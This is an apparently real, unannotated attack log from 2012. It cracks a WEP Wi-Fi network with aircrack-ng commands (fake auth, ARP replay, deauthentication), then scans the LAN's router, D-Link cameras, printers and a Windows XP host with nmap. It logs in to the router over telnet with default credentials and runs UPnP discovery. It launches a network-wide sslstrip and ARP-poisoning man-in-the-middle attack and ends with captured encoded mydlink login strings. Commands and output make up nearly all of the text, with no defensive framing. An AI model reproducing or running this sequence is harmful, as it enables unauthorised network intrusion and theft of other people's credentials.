airodump-ng wlan0
airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0
aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0
aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0
aircrack-ng wlan_be.cap
ifconfig
nmap -sP 192.168.1.1-255
[email protected]:~# nmap -sP 192.168.1.1-255Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CESTNmap scan report for 192.168.1.1Host is up (0.011s latency).MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)Nmap scan report for 192.168.1.10Host is up (0.033s latency).MAC Address: 00:1B:11:01:30:95 (D-Link)Nmap scan report for 192.168.1.13Host is up (0.0060s latency).MAC Address: 00:13:46:DB:B7:5C (D-Link)Nmap scan report for 192.168.1.14Host is up (0.071s latency).MAC Address: 00:13:46:DC:2D:60 (D-Link)Nmap scan report for 192.168.1.15Host is up (0.54s latency).MAC Address: 00:1C:F0:78:81:83 (D-Link)Nmap scan report for 192.168.1.16Host is up (0.17s latency).MAC Address: F0:7D:68:05:A6:D0 (D-Link)Nmap scan report for 192.168.1.17Host is up (0.17s latency).MAC Address: F0:7D:68:0A:87:5A (D-Link)Nmap scan report for 192.168.1.18Host is up (0.092s latency).MAC Address: F0:7D:68:0A:87:49 (D-Link)Nmap scan report for 192.168.1.19Host is up (0.32s latency).MAC Address: F0:7D:68:0A:86:C8 (D-Link)Nmap scan report for 192.168.1.20Host is up (0.53s latency).MAC Address: F0:7D:68:0A:85:4B (D-Link)Nmap scan report for 192.168.1.33Host is up (0.0037s latency).MAC Address: 00:26:24:75:5B:6F (Thomson)Nmap scan report for 192.168.1.34Host is up (0.0032s latency).MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)Nmap scan report for 192.168.1.36Host is up (0.0079s latency).MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)Nmap scan report for 192.168.1.38Host is up (0.25s latency).MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)Nmap scan report for 192.168.1.129Host is up.Nmap done: 255 IP addresses (15 hosts up) scanned in 14.13 seconds
[email protected]:~# nmap -sV -A 192.168.1.1Nmap scan report for 192.168.1.1Host is up (0.0065s latency).Not shown: 994 closed portsPORT STATE SERVICE VERSION21/tcp open ftp Xavi 7768 WAP ftpd 1.0023/tcp open telnet Zoom X6 ADSL router telnetd53/tcp open tcpwrapped80/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)2800/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)8008/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)Device type: broadband router|WAPRunning: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embeddedOS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932)Network Distance: 1 hopService Info: Devices: WAP, broadband routerTRACEROUTEHOP RTT ADDRESS1 6.45 ms 192.168.1.1
[email protected]:~# telnet 192.168.1.1Trying 192.168.1.1...Connected to 192.168.1.1.Escape character is '^]'. ,vvvdP9P???^ ,,, vvd###P^`^ vvvvv v vv#####?^ ????####vv, vv####?? ,vvvdP???^ ,,, ??##^ v#####? ,vvd##P?^ #?#v#vvv v#####? v###P^ ,vvv, '?#?, ######? ####?^ ,vd#P?^ `???## #####? v#### ,d##P^ '' ###### v#### ]###L _ _ _ ___ #####? v#### ]##L / / \ |\ | |_ \/ /\ |\ | | ###### #### ]###L \_ \_/ | \| |_ /\ /--\ | \| | ?#####v ####v ]##h, ,, ?##### ?###h, `9#hv, ,vv### ###### #####L ]###L ,v#v' ?#####vv ?9##hv, ,,vvvv###' ?#####vv `??9P\vv, ^ vv##, ###### #######L ??###hvv, ,vvv#?##????? `????9hdhvv,Login: 1234Password: ****Login successful--> 802.1x 802.1x port based authenticationacl snmp remote managementagent Get a file from a remote hostald Configuration commands for aldbridge Configure layer 2 bridgeclassifier Packet classifier configuration commandsconsole Console accessdhcpclient DHCP client configuration commandsdhcpserver DHCP server configuration commandsdnsclient DNS client configuration commandsdnsrelay DNS relay configurationemux Ethernet Switch Multiplex configuration commandsethernet Commands to configure ethernet transportsfirewall Firewall configuration commandsfullConeNat Full Cone NAT configuration commandshelp Top level CLI helpigmp igmp configuration commandsimdebug Directly access the information modelip Configure IP routerlan logger Log to a remote host using syslogmeter Packet metering configuration commandnat NAT configuration commandsport Physical port configuration commandspppoa PPP over ATM configurationpppoe PPP over Ethernet Configurationreboot reboot modemrestore_defaults set all configuration to factory settingrfc1483 Commands to configure RFC1483 transportssave_and_exit SAVES changes closing telnet sessionsave_and_reboot SAVES changes and reboots modem.save_config Save configurationscheduler Configuration commands for scheduler security Security configuration commands not specific to NAT or firewallsimpleconfig SimpleConfig Configuration commands sntpclient Simple Network Time Protocol Client commandsstop system System administration commandstransports Transport configuration commandsupnp UPnP configuration commandsuser User commandswanacl snmp remote managementwebserver Webserver configuration commandswpa Configure WPA (Wireless Protected Access)zipb Configure Dynamic ZIPB mode-->
Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.13Host is up (0.0076s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp GNU Inetutils FTPd 1.4.2|_ftp-anon: Anonymous FTP login allowed (FTP code 230)554/tcp open rtsp?| rtsp-methods: |_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN1501/tcp open sas-3?MAC Address: 00:13:46:DB:B7:5C (D-Link)Device type: general purposeRunning: Linux 2.4.XOS CPE: cpe:/o:linux:kernel:2.4OS details: Linux 2.4.18 - 2.4.35 (likely embedded)Network Distance: 1 hopService Info: Host: Network-CameraTRACEROUTEHOP RTT ADDRESS1 7.56 ms 192.168.1.13
[email protected]:~# nmap -sV -A 192.168.1.14Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.14Host is up (0.28s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp GNU Inetutils FTPd 1.4.2|_ftp-anon: Anonymous FTP login allowed (FTP code 230)23/tcp open telnet Openwall GNU/*/Linux telnetd554/tcp open rtsp?| rtsp-methods: |_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWNMAC Address: 00:13:46:DC:2D:60 (D-Link)Device type: general purposeRunning: Linux 2.4.XOS CPE: cpe:/o:linux:kernel:2.4OS details: Linux 2.4.18 - 2.4.35 (likely embedded)Network Distance: 1 hopService Info: Host: Network-Camera; OS: LinuxTRACEROUTEHOP RTT ADDRESS1 281.05 ms 192.168.1.14
[email protected]:~# nmap -sV -A 192.168.1.15Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.15Host is up (0.11s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION21/tcp open ftp GNU Inetutils FTPd 1.4.2|_ftp-anon: Anonymous FTP login allowed (FTP code 230)23/tcp open telnet Openwall GNU/*/Linux telnetd554/tcp open rtsp?| rtsp-methods: |_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN1503/tcp open imtc-mcs?MAC Address: 00:1C:F0:78:81:83 (D-Link)Device type: general purposeRunning: Linux 2.4.XOS CPE: cpe:/o:linux:kernel:2.4OS details: Linux 2.4.18 - 2.4.35 (likely embedded)Network Distance: 1 hopService Info: Host: Network-Camera; OS: LinuxTRACEROUTEHOP RTT ADDRESS1 113.45 ms 192.168.1.15
[email protected]:~# nmap -sV -A 192.168.1.16Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.16Host is up (0.27s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?443/tcp open ssl/http GoAhead-Webs embedded httpd| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW| Not valid before: 2010-02-05 08:14:40|_Not valid after: 2015-02-04 08:14:40|_http-methods: No Allow or Public header in OPTIONS response (status code 400)| http-title: Document Error: Unauthorized|_Requested resource was https://192.168.1.16:443/home.htmMAC Address: F0:7D:68:05:A6:D0 (D-Link)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:kernel:2.6OS details: Linux 2.6.13 - 2.6.31Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 271.54 ms 192.168.1.16
[email protected]:~# nmap -sV -A 192.168.1.17Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.17Host is up (0.34s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?443/tcp open ssl/http GoAhead-Webs embedded httpd| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW| Not valid before: 2010-02-05 08:14:40|_Not valid after: 2015-02-04 08:14:40|_http-methods: No Allow or Public header in OPTIONS response (status code 400)| http-title: Document Error: Unauthorized|_Requested resource was https://192.168.1.17:443/home.htmMAC Address: F0:7D:68:0A:87:5A (D-Link)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:kernel:2.6OS details: Linux 2.6.13 - 2.6.31Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 336.91 ms 192.168.1.17
nmap -sV -A 192.168.1.18Starting Nmap 5.61TEST4 ( http://nmap.org )Nmap scan report for 192.168.1.18Host is up (0.34s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?443/tcp open ssl/http GoAhead-Webs embedded httpd| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW| Not valid before: 2010-02-05 08:14:40|_Not valid after: 2015-02-04 08:14:40|_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was returned.MAC Address: F0:7D:68:0A:87:49 (D-Link)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:kernel:2.6OS details: Linux 2.6.13 - 2.6.31Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 338.75 ms 192.168.1.18
[email protected]:~# nmap -sV -A 192.168.1.19Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.19Host is up (0.66s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?443/tcp open ssl/http GoAhead-Webs embedded httpd| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW| Not valid before: 2010-02-05 08:14:40|_Not valid after: 2015-02-04 08:14:40|_http-methods: No Allow or Public header in OPTIONS response (status code 400)| http-title: Document Error: Unauthorized|_Requested resource was https://192.168.1.19:443/home.htmMAC Address: F0:7D:68:0A:86:C8 (D-Link)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:kernel:2.6OS details: Linux 2.6.13 - 2.6.31Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 655.43 ms 192.168.1.19
[email protected]:~# nmap -sV -A 192.168.1.20Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.20Host is up (0.36s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?443/tcp open ssl/http GoAhead-Webs embedded httpd| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW| Not valid before: 2010-02-05 08:14:40|_Not valid after: 2015-02-04 08:14:40|_http-methods: No Allow or Public header in OPTIONS response (status code 400)| http-title: Document Error: Unauthorized|_Requested resource was https://192.168.1.20:443/home.htmMAC Address: F0:7D:68:0A:85:4B (D-Link)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:kernel:2.6OS details: Linux 2.6.13 - 2.6.31Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 360.67 ms 192.168.1.20
[email protected]:~# nmap -sV -A 192.168.1.33Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CESTNmap scan report for 192.168.1.33Host is up (0.0045s latency).Not shown: 987 closed portsPORT STATE SERVICE VERSION80/tcp open http Virata-EmWeb 6.2.1|_http-title: HP Photosmart Wireless B109n-z139/tcp open tcpwrapped445/tcp open netbios-ssn6839/tcp open tcpwrapped7435/tcp open tcpwrapped8080/tcp open http-proxy?|_http-methods: No Allow or Public header in OPTIONS response (status code 404)9100/tcp open jetdirect?9101/tcp open jetdirect?9102/tcp open jetdirect?9110/tcp open unknown9220/tcp open hp-gsg HP Generic Scan Gateway 1.09290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway9500/tcp open ismserver?MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)Device type: printerRunning: HP embeddedOS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-seriesNetwork Distance: 1 hopService Info: Device: printerHost script results:|_nbstat: NetBIOS name: HPF4CE46EE2CE2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>TRACEROUTEHOP RTT ADDRESS1 4.55 ms 192.168.1.33
[email protected]:~# nmap -sV -A 192.168.1.34Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.34Host is up (0.0029s latency).Not shown: 990 filtered portsPORT STATE SERVICE VERSION21/tcp open tcpwrapped139/tcp open netbios-ssn427/tcp closed svrloc445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds700/tcp open tcpwrapped1073/tcp open tcpwrapped2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)6000/tcp open X11?8000/tcp open http-alt?8001/tcp open vcom-tunnel?MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)Device type: general purposeRunning (JUST GUESSING): Microsoft Windows XP|2003|2000 (98%)OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4Aggressive OS guesses: Microsoft Windows XP Professional SP2 (firewall enabled) (98%), Microsoft Windows Small Business Server 2003 (98%), Microsoft Windows XP SP2 (94%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP SP3 (93%), Microsoft Windows XP Embedded SP2 (92%), Microsoft Windows XP SP2 or SP3 (92%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (90%), Microsoft Windows Server 2003 SP1 or SP2 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_nbstat: NetBIOS name: JACOBO, NetBIOS user: <unknown>, NetBIOS MAC: 00:10:dc:e4:ee:c0 (Micro-star International CO.)|_smbv2-enabled: Server doesn't support SMBv2 protocol| smb-security-mode: | Account that was used for smb scripts: guest| User-level authentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, but default)| smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager)| Computer name: Jacobo| NetBIOS computer name: JACOBO| Workgroup: DEVO|_ System time: 2012-06-21 21:22:21 UTC+1TRACEROUTEHOP RTT ADDRESS1 2.94 ms 192.168.1.34
[email protected]:~# nmap -sV -A 192.168.1.36Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:43 CESTNmap scan report for 192.168.1.36Host is up (0.033s latency).Not shown: 985 closed portsPORT STATE SERVICE VERSION80/tcp open http?|_http-title: Site doesn't have a title (text/html; charset=UTF-8).139/tcp open tcpwrapped445/tcp open netbios-ssn631/tcp open ipp?|_http-methods: No Allow or Public header in OPTIONS response (status code 404)6839/tcp open tcpwrapped7435/tcp open tcpwrapped8080/tcp open http-proxy?9100/tcp open jetdirect?9101/tcp open jetdirect?9102/tcp open jetdirect?9110/tcp open unknown9111/tcp open DragonIDSConsole?9220/tcp open hp-gsg HP Generic Scan Gateway 1.09290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway9500/tcp open ismserver?MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)Device type: printer|power-deviceRunning: HP embedded, HP VxWorks, MGE embeddedOS CPE: cpe:/o:hp:vxworksOS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 5000 RT UPSNetwork Distance: 1 hopService Info: Device: printerHost script results:|_nbstat: NetBIOS name: HP9C8E99334DF0, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>TRACEROUTEHOP RTT ADDRESS1 33.32 ms 192.168.1.36
nmap -sV -A 192.168.1.38Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:55 CESTNmap scan report for 192.168.1.38Host is up (0.49s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION2869/tcp closed icslap2968/tcp open enpp?MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)Device type: general purpose|phone|specializedRunning (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%)OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ceAggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 486.83 ms 192.168.1.38
nmap -sV -A 192.168.1.10Starting Nmap 5.61TEST4Nmap scan report for 192.168.1.10Host is up (0.0072s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open tcpwrapped23/tcp open telnet D-Link Access Point telnetd80/tcp open tcpwrapped443/tcp open tcpwrapped| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/countryName=TW| Not valid before: 2004-07-12 09:02:20|_Not valid after: 2024-07-12 09:02:20| http-methods: Potentially risky methods: PUT|_See http://nmap.org/nsedoc/scripts/http-methods.htmlMAC Address: 00:1B:11:01:30:95 (D-Link)OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printerNetwork Distance: 1 hopService Info: Device: routerTRACEROUTEHOP RTT ADDRESS1 7.18 ms 192.168.1.10
[email protected]:~# nmap 239.255.255.250Starting Nmap 5.61TEST4Note: Host seems down. If it is really up, but blocking our ping probes, try -PnNmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds
/pentest/enumeration/miranda
upnp> msearchEntering discovery mode for 'upnp:rootdevice', Ctl+C to stop...****************************************************************SSDP reply message from 192.168.1.17:8838XML file is located at http://192.168.1.17:8838/rootdesc.xmlDevice is running Cellvision UPnP/1.0********************************************************************************************************************************SSDP reply message from 192.168.1.16:8156XML file is located at http://192.168.1.16:8156/rootdesc.xmlDevice is running Cellvision UPnP/1.0********************************************************************************************************************************SSDP reply message from 192.168.1.20:8838XML file is located at http://192.168.1.20:8838/rootdesc.xmlDevice is running Cellvision UPnP/1.0********************************************************************************************************************************SSDP reply message from 192.168.1.19:8838XML file is located at http://192.168.1.19:8838/rootdesc.xmlDevice is running Cellvision UPnP/1.0********************************************************************************************************************************SSDP reply message from 192.168.1.1:2800XML file is located at http://192.168.1.1:2800/WFADevice.xmlDevice is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0********************************************************************************************************************************SSDP reply message from 192.168.1.15:11993XML file is located at http://192.168.1.15:11993/description.xmlDevice is running Embedded UPnP/1.0********************************************************************************************************************************SSDP reply message from 192.168.1.18:8838XML file is located at http://192.168.1.18:8838/rootdesc.xmlDevice is running Cellvision UPnP/1.0********************************************************************************************************************************SSDP notification message from 192.168.1.13:10242XML file is located at http://192.168.1.13:10242/description.xmlDevice is running Embedded UPnP/1.0********************************************************************************************************************************SSDP reply message from 192.168.1.14:10242XML file is located at http://192.168.1.14:10242/description.xmlDevice is running Embedded UPnP/1.0****************************************************************
upnp> host list [0] 192.168.1.17:8838 [1] 192.168.1.16:8156 [2] 192.168.1.20:8838 [3] 192.168.1.19:8838 [4] 192.168.1.1:2800 [5] 192.168.1.15:11993 [6] 192.168.1.18:8838 [7] 192.168.1.13:10242 [8] 192.168.1.14:10242
[email protected]:~# yamasNo update availableScript is installed `YMM' `MM' db `7MMM. ,MMF' db .M"""bgd VMA ,V ;MM: MMMb dPMM ;MM: ,MI "Y VMA ,V ,V^MM. M YM ,M MM ,V^MM. `MMb. VMMP ,M `MM M Mb M' MM ,M `MM `YMMNq. MM AbmmmqMA M YM.P' MM AbmmmqMA . `MM MM A' VML M `YM' MM A' VML Mb dM .JMML..AMA. .AMMA..JML. `' .JMML..AMA. .AMMA.P"Ybmmd" ============================================================================ Welcome to Yet Another MITM Automation Script. == Use this tool responsibly, and enjoy! == Feel free to contribute and distribute this script as you please. == Official thread : http://tinyurl.com/yamas-bt5 == Check out the help (-h) to see new features and informations == You are running version 20120213 ============================================================================Message of the day : Reviewing some code...Could someone send me a complete log file? I'm planning on making a better parsing.On another note, I today had the privilege to witness that Yamas works against Youporn mobile. MMD.Please make sure to check out my last project : http://msimdb.comax.fr [+] Cleaning iptables [-] Cleaned. [+] Activating IP forwarding... [-] Activated. [+] Configuring iptables... To what port should the traffic be redirected to? (default = 8080)Port 8080 selected as default. From what port should the traffic be redirected to? (default = 80)Port 80 selected as default. Traffic from port 80 will be redirected to port 8080 [-] Traffic rerouted [+] Activating sslstrip... Choose filename to output : (default = yamas)wlan_ed Sslstrip will be listening on port 8080 and outputting log in /tmp/wlan_ed.txtsslstrip 0.9 by Moxie Marlinspike running... [-] Sslstrip is running. [+] Activating ARP cache poisoning... Gateway : 192.168.1.1 Interface : wlan0Enter IP gateway adress or press enter to use 192.168.1.1.192.168.1.1 selected as default.What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.wlan0 selected as default.We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.Press enter to default. Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof[-] Arp cache poisoning is launched. Keep new window(s) running. Attack should be running smooth, enjoy.
Website = prov.eu.mydlink.com):Login = tfQmw7Lw5EAzo1LgDdUkp1vyZCx6XRXyMvi6TA6o7PW5UPCp4Yf5D54cSTQ6xdbpgYT6FsJoqYQdRsXps3Aw88Mm18tsUsMy20T37OboNmy5VdvoavTsWjZ7ro3kF17inCMlV5WggzDjGstwB8gyrw3wRd7mzyY3HTU$Website = prov.eu.mydlink.com):Login = Pw2eMpFln89k4cF6Tcpo6m/6ItsmWvNsMpdlSdj5xyGoQyB6yvhoXjzeFzpvs5+6d6HvrAFibT2tHB0$Website = prov.eu.mydlink.com):Login = 4cr6n8hci/evlGheWlo7kGHsQKBmA+ssKu1mUJ938VzjTVa83XNjWfPwCZrmvlR8yXlmEkp3zXrtVks8ebec7gn62gVyTkns1Hlo8FR3GqFjRlH3q7NySr2keaw7VVqnn9s4EGlnsIoyCJe8ZSOtWW+zvI2tcSezZZq$Website = prov.eu.mydlink.com):Login = QkjpNasdssmsvjsxWj/rbvpxQoFqTmakXyVdY32f3pwrIpqxim0rMcanYolwZsqmTjewmw9odpr3cBayEQz$Website = prov.eu.mydlink.com):Login = +en3Kneyp7ht6feaRUwi5f/wHnOoG4mwO9Ro0kF6nbpp9bl5hePpRGNsFrnorU15aeaoSJz6benvDJm5cVhyjFr3YF2c9JrwJxamng16AW9pWU/6tHRlQK+tzSddNbevsfmdQencc4jkEq2iebjlVqqra+wkFqhebbk$Website = prov.eu.mydlink.com):